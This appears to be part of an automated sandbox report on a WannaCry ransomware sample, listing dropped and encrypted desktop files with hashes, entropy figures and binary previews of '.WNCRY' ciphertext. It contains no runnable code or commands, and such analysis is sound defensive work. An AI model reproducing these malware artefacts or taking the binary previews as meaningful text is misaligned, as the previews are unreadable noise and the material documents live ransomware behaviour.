                                                  Preview:WANACRY!....].8M~.VSq...j.X......_....e$a...Y.....9.._.d..^......D.!......-....E .s&.."3...../..+o.JY.ON.(.qE.G..z..+1Pd+q[..../z-..+..#Y....*;.....[>B..R..6/...W>#.H.......9o.....4........../..d....d.2.T..bW....n.5.@..........'....o.X.e.5C..y....<..m............gA....*........ xO..9.....RrS..Z8.zc.K.......}..Y...bJ.v......~X.Tz..~.g..jY.....S..B..x.@..k....E.n)..R.....^.2....]F8.......:...p#.....P..F...U|.Q..uq....v.. .5.,.cbM......_S.$...$R...k..D.. ..N_.^..Vzn..._(..1.%.Xi..x.w..R..../..*p.V..He........yN.#.0....S..3.....z.`...O./.:...o.gl ..,..N....e4..Z.d..5.s.....6..M..X...X......I+H.,K.sF5.R..@..H..1.yz...r..re.....YaH....W...>.L......4..1.......&q)%....)..d8HYm0..W:...\....VZ.m^3u......O.>~....q...v~.x{k`..e=..4.$?`...=T.+.bzwZ.....ZBo..0,....L8..:.Zk...dhF.`.0}.S!.!.OT.l~a.Q.x.M!7...,.-..m...n..j.{Z....;..Q3g.Q96{PO...3...U...mEcA..HZ.B..\zJ.7.e.ph.@.J.q..vo.0Z.jWT.k./>.bi..._FWE..3xm..:LJL}.A.I..P...~.-X....s.&zYT.w....+.`..

                                                  C:\Users\user\Desktop\PWCCAWLGRE.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847505072532563
                                                  Encrypted:false
                                                  SSDEEP:24:YLydq3ZLeW39JRkVwwYUct6g0z7HYJdfbUcy90pI6G4Yqh:jK7i1YHt6g0zmRgbWpHp
                                                  MD5:B4A6AF8A7034D7F880B865771AD2DAE1
                                                  SHA1:89FDD8CF2C37AAE6D8E46544FB7CBADEF7D8C4CA
                                                  SHA-256:BBA338AC7025AFD9B4D34DB3AA74635E7EF4A65BB2DABE7D21F9D6CC2C696990
                                                  SHA-512:6D750EC334959FC785297AB22C016B5479EA7B85F82CFC41D019F34187F9928A2591FFE6C758A7BF389F5B565B65452C077F08F0C1B4FA1870569A1B2D2FB5A0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:.t7H.....Ft..Bz...qC.....~dz...J.<."R.....Ae...1.$U.q...c...P..Z0....Y&&~..k..[V.+.W...|..........M2.........3k.1..w..5...xe.W]"w...}..z...|.7f..1..Q..t....e..A.......W.s.....@.r/.e...O..9..l.....K...+,.'.r......$.W;?..(.j..j,.q.c.y_....T.O.._.\R.......r.......c.bD3..1.{.....rb...WS.;r..(..Z..7....@......sH.Wlic.....=:s...-..V/.....V...j..E.....7.+..`_.O......8J..@.Q.:h.#?K.......nv...r....IA............a...'..^r.l?+i.w.U..G......J.G3GZf..-.l.c+...7-...j.Ggz.9r.h.+........G.ea..u.t.py.;....'6....R..!JO....I.a..`.eF.+..+e bN.R}..)n.B].N?..+...|/.~..Nr.0...R...2......e....".;...t...'&EK4..p..b.X.[.8:8..6..S|.L.....T.......ee...3j...,.k^.F..s{....S.... F..8...8.P+...W..Y.7?..E...5.(4....7v.f._..0g.mLeFac.Q..}..?P...d.g.Uku(.......kz'.K.^.f....c!g...9..w./.'.hd.!.)....i..{.....P..Xp.~...z%..Yv7z....jf6../.r.D..u..}%9...0d.?....>.z.\..8v.=.S..$...n."........xL.W.`S.E`....5.T............34....]h].~<.O..@.....r.x.[..=.M.g.q..ZB.h...4g^A....6.>

                                                  C:\Users\user\Desktop\PWCCAWLGRE.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.875810869772536
                                                  Encrypted:false
                                                  SSDEEP:24:bkZh0s93Kqm/Maa55sHWHbpmRO33Fd7FHNaeAtBVgxG1Rfb8EBXGXc:bkZhCqmEaQJmgV5Ftaeo1RjRBWs
                                                  MD5:019E1C06E1ED5440D4EBCB2DA5573329
                                                  SHA1:A5C323CADFC9CA631D179D10D10F2889BB65A2CC
                                                  SHA-256:C61BF9E0A6A52A0585F06B0A199D7C4CCB60C727E6A92FEDB1CF12010348F6EC
                                                  SHA-512:0D2D8932A212CAA3A61608943F47BB6501B88336C53EDDA57B772FEA245A037BB83ACB93B983FDBBD8668E05EDAA99860E5AFFC8255FC5BB3FACD84B1BF359B5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...... mu....."!...m[n.....U..z.+..~..j..AF.....N...;1...t.F...r2..vF/.....u...a...:4&....k.v. ...........^.f.V.(.4.JB..A.&..s.....]...t..h3.H.XY..^.......q..iW.s...Iv.P.)q..'Z.'z.....W..|...Z.-.e:.5.x...g@...K.Z.Y]b..1.6..~...;"ot..@.1.V.Y.#.V.qK_..............Q.....N$t9a..0D....N{N..M..~qx"$....c...rB...(.A.g.H.#.&..-_Jri....*X....m...K%..;.\......Z....t.!..~:.Z..........L.G..X......C|.....p:p....U'..!:....).....4[..].l.....6..-.CiY....h...!..".dn..N.KP..G&.^.....FEe..d..)..(.}C.1....#...Lh.e.XT....kIT..`...;Y:...s....R..k.....u....r.....:>.f..@=f...6.hb7._4hO.........=.8.^R...V.J..L.....;.zB.....~g(.6.....i;.....9).{.,...Z;.S.S.[M...".......oi.x..4%.rX3Ta.....{.L.axJ.2.?:...'|.>d...t.|.S.....,...y.......g.CZ..)G....J.j.%..L.....sH..h=U.(.%..........g.A7E....x}5.....Q..0 d..w`...G..(C..F0.x.........]b.7...KDD..Y...e.2.:...p.I....v....Qw.#.w.O.u."#J..a=.(.4Q.....@I.."..G.iw..[..fN0.3.....ff.. ......E....zx..xZ..3-...Z.J..6.?....D

                                                  C:\Users\user\Desktop\PWCCAWLGRE.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.875810869772536
                                                  Encrypted:false
                                                  SSDEEP:24:bkZh0s93Kqm/Maa55sHWHbpmRO33Fd7FHNaeAtBVgxG1Rfb8EBXGXc:bkZhCqmEaQJmgV5Ftaeo1RjRBWs
                                                  MD5:019E1C06E1ED5440D4EBCB2DA5573329
                                                  SHA1:A5C323CADFC9CA631D179D10D10F2889BB65A2CC
                                                  SHA-256:C61BF9E0A6A52A0585F06B0A199D7C4CCB60C727E6A92FEDB1CF12010348F6EC
                                                  SHA-512:0D2D8932A212CAA3A61608943F47BB6501B88336C53EDDA57B772FEA245A037BB83ACB93B983FDBBD8668E05EDAA99860E5AFFC8255FC5BB3FACD84B1BF359B5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...... mu....."!...m[n.....U..z.+..~..j..AF.....N...;1...t.F...r2..vF/.....u...a...:4&....k.v. ...........^.f.V.(.4.JB..A.&..s.....]...t..h3.H.XY..^.......q..iW.s...Iv.P.)q..'Z.'z.....W..|...Z.-.e:.5.x...g@...K.Z.Y]b..1.6..~...;"ot..@.1.V.Y.#.V.qK_..............Q.....N$t9a..0D....N{N..M..~qx"$....c...rB...(.A.g.H.#.&..-_Jri....*X....m...K%..;.\......Z....t.!..~:.Z..........L.G..X......C|.....p:p....U'..!:....).....4[..].l.....6..-.CiY....h...!..".dn..N.KP..G&.^.....FEe..d..)..(.}C.1....#...Lh.e.XT....kIT..`...;Y:...s....R..k.....u....r.....:>.f..@=f...6.hb7._4hO.........=.8.^R...V.J..L.....;.zB.....~g(.6.....i;.....9).{.,...Z;.S.S.[M...".......oi.x..4%.rX3Ta.....{.L.axJ.2.?:...'|.>d...t.|.S.....,...y.......g.CZ..)G....J.j.%..L.....sH..h=U.(.%..........g.A7E....x}5.....Q..0 d..w`...G..(C..F0.x.........]b.7...KDD..Y...e.2.:...p.I....v....Qw.#.w.O.u."#J..a=.(.4Q.....@I.."..G.iw..[..fN0.3.....ff.. ......E....zx..xZ..3-...Z.J..6.?....D

                                                  C:\Users\user\Desktop\PWCCAWLGRE.pdf

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.794064516864858
                                                  Encrypted:false
                                                  SSDEEP:24:UyuQ6tLe5xlPsBZesAIzom+xGh1m1F20T/PtjW6jERNwUVg:nuQ65Yar+Gh1uFL9jLjX/
                                                  MD5:A7FE7DA33DD6D27FE23582BE8787B170
                                                  SHA1:3D28688AF0F11667CFC93BE036D0530A79C53AEE
                                                  SHA-256:19FCA46084D702B3BD891D2E807BE4CF84EDC03FFD465A7DED7D5C5F65CE4FE4
                                                  SHA-512:B2122BD46EEC9B77665FA58D8FFD7736213E5224D0688D7FF31FBB4C8D61FC60BBFBDEF444086FC04C23C9AC4FAB578A58903599D90A4A855C3DA19F33FE4560
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..A\....F......`..V..v]..k.....h5.._...K.p......IB~..:.d}.p/.....5+.....,.M.R(.6...5....."r.ckm........?....T'.ct....@.......s.....Lb........]i..J.....hPY.?*.E.R.O.....S..c.#.._...3.4.3<.y....>F.....A...4.8Qd.*R..>Tl.c.....g.A.%<.R..L7h.r..IPy.%..1z...<...b}*.m.....?+..Bf)O...S..m.wq...`e.i/tE..#u..W.$L.....).fx.p..d..A.._.`...:...y..!.k...s...!_.;....pG4c..A...V.6..6......Zi......=.....1...O..........uT.......L..K'.8sU..}.D....@K.tt.{..B....[..'.......3.^. }...6.A.r/,sc."m..hd.&.M>......*w...!.i.....]...[....sy....NXT6gX.z.4.........r...!...}.{.r..W.."..w.(.....3.4.B...O.$h.Z_.'.&L,......-m$@t!7l...3.[...r).i......O...W.6&2.........M-?.x...F.k...s.......x.h.H..=.Z.s.]..,t[..).6gk<....G...x>Fk.}..........,V$^d...&......i...?x..V.R.*{ :b...y37.cz.n....b.......yh.5..q..N..%..0)............J:%r.~.... .\RM5.D....J.u.....j.(&.V.;...M...q....d.l..C.m.h..!S...^..h....T&...T..%...[.qg.G.O..L..8...t........jU..n(g.U....X..<'..-S.2..#.q....t..}...

                                                  C:\Users\user\Desktop\PWCCAWLGRE.pdf.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8510831089474244
                                                  Encrypted:false
                                                  SSDEEP:24:bk1LEIaOUTrG757HOea/3SngRf4WGJHXKSatRuQPsxpdWK89O5XZx:bk1LEIa1adiZ3Sn64WGJ3KtRopdW1oXD
                                                  MD5:FDF9C087B8D6605DFEF17406863A0112
                                                  SHA1:E9623AF796F2AFBC5CD65AFC301B457902827EC3
                                                  SHA-256:E37E9D397F26503B0FBC91AFD2D3FF5F94425DDDE4E20975157AD034497808F5
                                                  SHA-512:13BF2A15EC419EE31E3A6A404B8BD8BFB2C1003FA5E0384E1A825CF97E7F967D9410018A626C4A7D8E651B4C7D939B0E21F23FB6998735FE62FF2E05E15E74F2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......U..J.?.u.....[.....5...w_k.......gr...^IM......}.....3..r.a....Ih.=...u!#.8i...S./..(....vA$J....g....ZV..{..11..7R....O..)~..R.kY.u.....X.....j......3O.O,7i..O...\.3,.%..~.~.p...u.i.7.....'[..{..wC{..Q..'..Mg..x' .....$..<..2bb."......t...................Ph..>Eq..Q.&Id... .2..;y)...../.j.*Rw.Z..{...Y........_......_.+|+...a.h~V.heH5.B.k"....]w../.........3.E..G....g...,.6/ ...SI.{....U........{.D..-D..X..n.3.{3..c.......I'..(....S.y1..#.Z.P.2..v!.K..Jqs.Q.;..[.....K.3.}.jr.....Y...!.X9.......^.}E......3:.....h...b...|Zj....|.s.-..*...L....S...k......^....z.K.^i..Y...a..v{.......V.J<.....e6...o|7.<.o.....0g..-...l.....L.}.c...,......c;...L.#....ooX.&...G#.92...U..2._..5.m..K.[.`3$F.S.....l..v...`...Q.CK..]..7I.6]ZDa.....?.$..l,.l.f.iiDE..S...e..J.F.......c....8...-..Q0.v...=gn.-.1..a.5....be.".:..Q7%...i..s.......k..7.[,).Tg...$wq....p.}}-..)...6y......10.....=.w.'...".F#lhU$..........dH..x...Q..d2.i.|:....=.@(..`..

                                                  C:\Users\user\Desktop\PWCCAWLGRE.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8510831089474244
                                                  Encrypted:false
                                                  SSDEEP:24:bk1LEIaOUTrG757HOea/3SngRf4WGJHXKSatRuQPsxpdWK89O5XZx:bk1LEIa1adiZ3Sn64WGJ3KtRopdW1oXD
                                                  MD5:FDF9C087B8D6605DFEF17406863A0112
                                                  SHA1:E9623AF796F2AFBC5CD65AFC301B457902827EC3
                                                  SHA-256:E37E9D397F26503B0FBC91AFD2D3FF5F94425DDDE4E20975157AD034497808F5
                                                  SHA-512:13BF2A15EC419EE31E3A6A404B8BD8BFB2C1003FA5E0384E1A825CF97E7F967D9410018A626C4A7D8E651B4C7D939B0E21F23FB6998735FE62FF2E05E15E74F2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......U..J.?.u.....[.....5...w_k.......gr...^IM......}.....3..r.a....Ih.=...u!#.8i...S./..(....vA$J....g....ZV..{..11..7R....O..)~..R.kY.u.....X.....j......3O.O,7i..O...\.3,.%..~.~.p...u.i.7.....'[..{..wC{..Q..'..Mg..x' .....$..<..2bb."......t...................Ph..>Eq..Q.&Id... .2..;y)...../.j.*Rw.Z..{...Y........_......_.+|+...a.h~V.heH5.B.k"....]w../.........3.E..G....g...,.6/ ...SI.{....U........{.D..-D..X..n.3.{3..c.......I'..(....S.y1..#.Z.P.2..v!.K..Jqs.Q.;..[.....K.3.}.jr.....Y...!.X9.......^.}E......3:.....h...b...|Zj....|.s.-..*...L....S...k......^....z.K.^i..Y...a..v{.......V.J<.....e6...o|7.<.o.....0g..-...l.....L.}.c...,......c;...L.#....ooX.&...G#.92...U..2._..5.m..K.[.`3$F.S.....l..v...`...Q.CK..]..7I.6]ZDa.....?.$..l,.l.f.iiDE..S...e..J.F.......c....8...-..Q0.v...=gn.-.1..a.5....be.".:..Q7%...i..s.......k..7.[,).Tg...$wq....p.}}-..)...6y......10.....=.w.'...".F#lhU$..........dH..x...Q..d2.i.|:....=.@(..`..

                                                  C:\Users\user\Desktop\PWCCAWLGRE.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.806038744753786
                                                  Encrypted:false
                                                  SSDEEP:24:U9AV7CVBbVSk5ChrsCPgk0bnAvb4rKxCiRnMOv:GpBBt5ChrsCPgRjY0rNiRR
                                                  MD5:1114513BBBDBFB82E197CDD8F61D085B
                                                  SHA1:DBF1AE27225CC13B2FA0460DEE7FE74B19FA3AE7
                                                  SHA-256:00966092DD665F6C8F9D95CCFA724FE689929CEBD2C4B18E415F33BDC54F0000
                                                  SHA-512:F47539CA1C88AF28DA545D37228F1EBF7D4F9910815D6479E0B6479F4EE6165CC331218C579535DDCBA5E77CB98FA000B8D47AF8EF7D7E5FE4AEC25EA477C8F0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....q...D.*....].5......[...C.V..M.Y.N.DlkN..j..q.fm..c...\.2.B._........l.7....2.B#.,.....~......V....k..>qE!P...E..uz..mO....X.@.F(..C.....g{X.....S..Zj.W.+vu).C..'.OB.....x.W.h...=.....<Y.]..|.F..G|.}..........E.UC.Wv.D.-.A...q6G..a(`)......\@.6NL...L....*...+|....)....w.6.|...#$p.nG..H..{..*..........Z4.......?.1;s.q.W...g.?.g..,U.b.........L...K..y..E.u...oN....L...T.m.:.Q.q.....f..t:......R<..(Ky+?....0V.g...vrF.Z&..*Qos9w....p.=...@%w..|E;.*jq.z4......J...XC..:,(I..p.*!.t9S..$.|.qeStyn.(d.\S....:...6R.T......!.o.IO.+.......1.......9`;w.s.. ..3...26.......N.T.E.....j.12...@......VU._|B...\MW>....2C... ...#.'......7.B...*q.....S.0..x#...k.-.EP.".....*..|.....x........r.I....,...t...K...7..A...)......%...dF.E...\i..u.S.........^m.z..X..5F....B.=...2...J..!&....,.G.a.....>H..1.W..."NE:./...u...#..........'8..\J6....w..+.&oH2!.....H;..{....L.jR..c>.o.U.N.R547"..d...!0....`.@.... ..L&...R..Q-uf8Y....._".i.27..8...W..a.O.....BG!.8..S..%+..}p.t...

                                                  C:\Users\user\Desktop\PWCCAWLGRE.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.877518914137892
                                                  Encrypted:false
                                                  SSDEEP:24:bkPn/GjbjQHeW1jXyIFzS32iGIdnHSIkqZTsQA6jyW6AxmXW650:bkPnupW1jCIFzSGItyIjZwQVF6AxW0
                                                  MD5:36F5BA162D2F0EDE876ABDC8BD4369D6
                                                  SHA1:CFEAC9D157D2AE96D846851528C0FB8E46ABB2A6
                                                  SHA-256:69C46A69A5E101B7B54DF2751F4E0E3BEE5748C0EE4AF5A74EA4A78243DEE25A
                                                  SHA-512:FADF9D3DEE2631DC286359A209C63C6826ABB012278C385C279265511C2E660D23920C2CFAB9ACCCB8EE7C574B1202FA204807AA826CBF8F5328A52D0AFCC31F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....?..9..*..=......*........i9y5.....s....km@..Wj...qE....e^D..........m.I.s.....M.k.....=..U6....:-Y. .._4..#..M...1{.G.}...h..3...F..aP.0o.....B.Bb.c..+h;HFL..Y..G_...D...c=...T.I...N0u.UQl.O../.._...&.'.2...BR..lm.$.t .(.&.>aQ......`....?\.R.l............;..n...W.m.....Z{.kx5.".e+....z..y...89V.F<...K~.H.,6...;.\...%.aun..._....eh%O.h.6..N...%../..s=.+ye..D'o.`..j...Wi...#[..0.{.Q....i]H.....~J2#.ad..T}.+e.%29y.\-..4.=R....W..2.........YM7.V....f8.F..\....Ds.K~C.r.5+6?.".>O..~.R..]..1C.~.....^.Q..!j7.L.X2.5f.K............`2..>..G@..c.P.c..B..]R.3}...%.m..._...<M0Vm.E..a^|.....).L.X......$.....3.....x.,l.._.I.Q...C.4....z...{...qG..>T.........$g.X.I.B........|.o.....`...@./v3|.4QJ._...-.`.a.....Dc.'...g..'(.X.S...H.2..w..9..<K..q...lV..7?....@.Ix..p!...A .?..].....+.o.....J."..[..)....vS.".k...PID....3..<..o.]..i:r.f.OOk.N.e...#.".i?..4&..../p+.....}.a:.&4.u..xU..#1.K..uG~......<.....C.q......Zv.....b...8.7.;....{..]..=.....^.

                                                  C:\Users\user\Desktop\PWCCAWLGRE.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.877518914137892
                                                  Encrypted:false
                                                  SSDEEP:24:bkPn/GjbjQHeW1jXyIFzS32iGIdnHSIkqZTsQA6jyW6AxmXW650:bkPnupW1jCIFzSGItyIjZwQVF6AxW0
                                                  MD5:36F5BA162D2F0EDE876ABDC8BD4369D6
                                                  SHA1:CFEAC9D157D2AE96D846851528C0FB8E46ABB2A6
                                                  SHA-256:69C46A69A5E101B7B54DF2751F4E0E3BEE5748C0EE4AF5A74EA4A78243DEE25A
                                                  SHA-512:FADF9D3DEE2631DC286359A209C63C6826ABB012278C385C279265511C2E660D23920C2CFAB9ACCCB8EE7C574B1202FA204807AA826CBF8F5328A52D0AFCC31F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....?..9..*..=......*........i9y5.....s....km@..Wj...qE....e^D..........m.I.s.....M.k.....=..U6....:-Y. .._4..#..M...1{.G.}...h..3...F..aP.0o.....B.Bb.c..+h;HFL..Y..G_...D...c=...T.I...N0u.UQl.O../.._...&.'.2...BR..lm.$.t .(.&.>aQ......`....?\.R.l............;..n...W.m.....Z{.kx5.".e+....z..y...89V.F<...K~.H.,6...;.\...%.aun..._....eh%O.h.6..N...%../..s=.+ye..D'o.`..j...Wi...#[..0.{.Q....i]H.....~J2#.ad..T}.+e.%29y.\-..4.=R....W..2.........YM7.V....f8.F..\....Ds.K~C.r.5+6?.".>O..~.R..]..1C.~.....^.Q..!j7.L.X2.5f.K............`2..>..G@..c.P.c..B..]R.3}...%.m..._...<M0Vm.E..a^|.....).L.X......$.....3.....x.,l.._.I.Q...C.4....z...{...qG..>T.........$g.X.I.B........|.o.....`...@./v3|.4QJ._...-.`.a.....Dc.'...g..'(.X.S...H.2..w..9..<K..q...lV..7?....@.Ix..p!...A .?..].....+.o.....J."..[..)....vS.".k...PID....3..<..o.]..i:r.f.OOk.N.e...#.".i?..4&..../p+.....}.a:.&4.u..xU..#1.K..uG~......<.....C.q......Zv.....b...8.7.;....{..]..=.....^.

                                                  C:\Users\user\Desktop\QCFWYSKMHA.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827279835381131
                                                  Encrypted:false
                                                  SSDEEP:24:CSD5ouH3AGSjN79UQV/XgUBPif6V/e4bNZ9KIbr1+imLp:CYH3tM9p/QmPoh4hZPJml
                                                  MD5:ADE09F57ADE0A92EDFE626F98208C440
                                                  SHA1:BA547705FFEEC6B8D176ED8B1D119BD7349E921C
                                                  SHA-256:798E1AEC3C39211C8F2C70547C305C6E10108A7A7C7782612E1C475C92B98D3A
                                                  SHA-512:49A62E9585C2668B0A13040C2E6356CAFA29BDA9F98033766F86134019D1E67001A7465BAABDE433CCB00FE0D86579360B072C38593BC18573E23FFE9D7C36B0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:dm[....3....=...5..@...B..uI.@;H.P.o.j.T..../7..f.,.T...p...!..'._......V.EJ....F;.6o..-....o.0P.....,....F.L....q".[r..t.(<F+g. pd......M......Q.b........4CI....Y....6>....t.$.D.W(*......{9..[..F[..{aj.N!.qo.....}..j.^.m..l.U.,V...N.....Rn3..0.)H*./.w.X.8^..K-.X/.\pT.4.8w.[o..$.B.Bq..D.'6.}.{......_...$..4.....k.R|.....k....4..C.a..h...W.g......H.mB...*.D#.3.c....B..Y.x.'1&..p.|.D. ez&8...^.....~l..M?cj.J4`$....{Y.^6.....Hk(...I.o+.......^..m3...=m....\.......5.]..$..[...ZD.e.~...........cf...:..%H.l..R-....P.Z+.1.g.J..&4Av.&XF!..l.imR.0*.5..2qiG~<..d..ll....f.A..P.0.`.5.q.#..sVd.$. r..z........f.<.....d......4.k.s...*...I....c.;...W.x....j.rV..y.~.L..1.}.z.W2..........4.o.GWo/..w..........F2\9.#r.x..........M=$v.....(..q.b.=D.|8.#E....J.g.-Y<....<..o.a................<....b...4...b\.n..?g/q.Y.r~.G..qC.d.^...zh..S....dv...q..^....v..l.l.|}.p..:o.>!.U..h.B..Y...!.f...F.|....?3i.1.....I.).^.<NO.>.2=k.1.:..v.=.f.)V.2..N..w3Q

                                                  C:\Users\user\Desktop\QCFWYSKMHA.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833024310109551
                                                  Encrypted:false
                                                  SSDEEP:24:bkP6VwNGhqPyivdJ1xpRnWUdpznrc2VRTJattQBVrAhTNWlmMoVCzAkS6NY6/6B:bkyVtqPyi1J1nRntrJVJJazQnrZEMoAy
                                                  MD5:639180ADD49631302406806D51868FF2
                                                  SHA1:F6F7E5C518890CA8A9BFC27A06BFA885D996F2D8
                                                  SHA-256:31598B014E57B780E4DB550ED65ED7A0AE1208BD9D4071EBFA33C97CF7F905D8
                                                  SHA-512:CE1E1E252EE2541029DCD031671126FB7F6D2A00E52B5C8F3156F6B06A20FE6AC7739777E9772BC304CBFBF623E2FC723228DE4CCD3B87E3DAC6186A067715DA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S6...Ps+..~c...C((...E....+.7!...."..@.5.a.aA#...&d.6`.....|._.Wq.T.]....A....B..k.....W..2.$.1..;..$......];uI..v...j. ..E...%....*LM\........OE..K..-..('.G4......q..o.xA......N..........8.PE..XZ..n.....5.f;.'..`....5...8\.0..3..<...+.eu.kPx.K8............Q.LW.5.N.{R...+./..,..w...l.@.'<..c.g....q.Z.'J..F...]A.'~..8........N.T.EBX.k`.L....V...AB.@.?@&..&.?N..~...T.....0...X.....:...;.f.~}.>....khB.X.=<.]....,........y@pl....)3..G..*;....8.ji2..+.....w..lh........B.$u(.....*..L..m.'..O..k...P........`uO..8...S...z....h.b<....q..y...9"P./..G,T......(..f....?..6..-p..........,*...h|?.t..V3x.x....uY.....'.kc..V3s....Ys."..|...:|.....u....]Q........S..0.A..`.H.b...)kN!sl.:..L....:R...u........}"..[.f'.....N.j.L..3..(o..+z.!K][.=.?..rD.0.J5e.....+..z.RO(4.....q;.=.;.h....,.T*.9);.VN..+8@.y......}_....m.8....$".>..?K..N.>......k....&1..Y.'.\....$2p...cY,:..AT1.~G.m.......1.M..#..%....Wl.....].?.=W.....v..f|..A.,......P

                                                  C:\Users\user\Desktop\QCFWYSKMHA.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833024310109551
                                                  Encrypted:false
                                                  SSDEEP:24:bkP6VwNGhqPyivdJ1xpRnWUdpznrc2VRTJattQBVrAhTNWlmMoVCzAkS6NY6/6B:bkyVtqPyi1J1nRntrJVJJazQnrZEMoAy
                                                  MD5:639180ADD49631302406806D51868FF2
                                                  SHA1:F6F7E5C518890CA8A9BFC27A06BFA885D996F2D8
                                                  SHA-256:31598B014E57B780E4DB550ED65ED7A0AE1208BD9D4071EBFA33C97CF7F905D8
                                                  SHA-512:CE1E1E252EE2541029DCD031671126FB7F6D2A00E52B5C8F3156F6B06A20FE6AC7739777E9772BC304CBFBF623E2FC723228DE4CCD3B87E3DAC6186A067715DA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S6...Ps+..~c...C((...E....+.7!...."..@.5.a.aA#...&d.6`.....|._.Wq.T.]....A....B..k.....W..2.$.1..;..$......];uI..v...j. ..E...%....*LM\........OE..K..-..('.G4......q..o.xA......N..........8.PE..XZ..n.....5.f;.'..`....5...8\.0..3..<...+.eu.kPx.K8............Q.LW.5.N.{R...+./..,..w...l.@.'<..c.g....q.Z.'J..F...]A.'~..8........N.T.EBX.k`.L....V...AB.@.?@&..&.?N..~...T.....0...X.....:...;.f.~}.>....khB.X.=<.]....,........y@pl....)3..G..*;....8.ji2..+.....w..lh........B.$u(.....*..L..m.'..O..k...P........`uO..8...S...z....h.b<....q..y...9"P./..G,T......(..f....?..6..-p..........,*...h|?.t..V3x.x....uY.....'.kc..V3s....Ys."..|...:|.....u....]Q........S..0.A..`.H.b...)kN!sl.:..L....:R...u........}"..[.f'.....N.j.L..3..(o..+z.!K][.=.?..rD.0.J5e.....+..z.RO(4.....q;.=.;.h....,.T*.9);.VN..+8@.y......}_....m.8....$".>..?K..N.>......k....&1..Y.'.\....$2p...cY,:..AT1.~G.m.......1.M..#..%....Wl.....].?.=W.....v..f|..A.,......P

                                                  C:\Users\user\Desktop\QNCYCDFIJJ.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.817605082713292
                                                  Encrypted:false
                                                  SSDEEP:24:xzvtkgYX+wiIJbG6qKt5tQlRVJS6iv5th/WuBLHvDrCh:ltZYX9NJKs5tQlJgv5OYLPDrC
                                                  MD5:F94BD89856E27CBBBF1DDCC317404C20
                                                  SHA1:7A93781DF0A0EEF593F2133A67501D3B8B6E129D
                                                  SHA-256:126E54C6D209DD003123DD62EDF4236C98C9F39D3C459FED68FD32ACE4D1C30F
                                                  SHA-512:C96035E03B44E67B29E3874AD356966C82370814884757BFC0A1A713355F38C381E3307B12EF1BC0160F8E00428CF750B90A9765A63E9EDCE6625339B7DBFE84
                                                  Malicious:false
                                                  Reputation:unknown
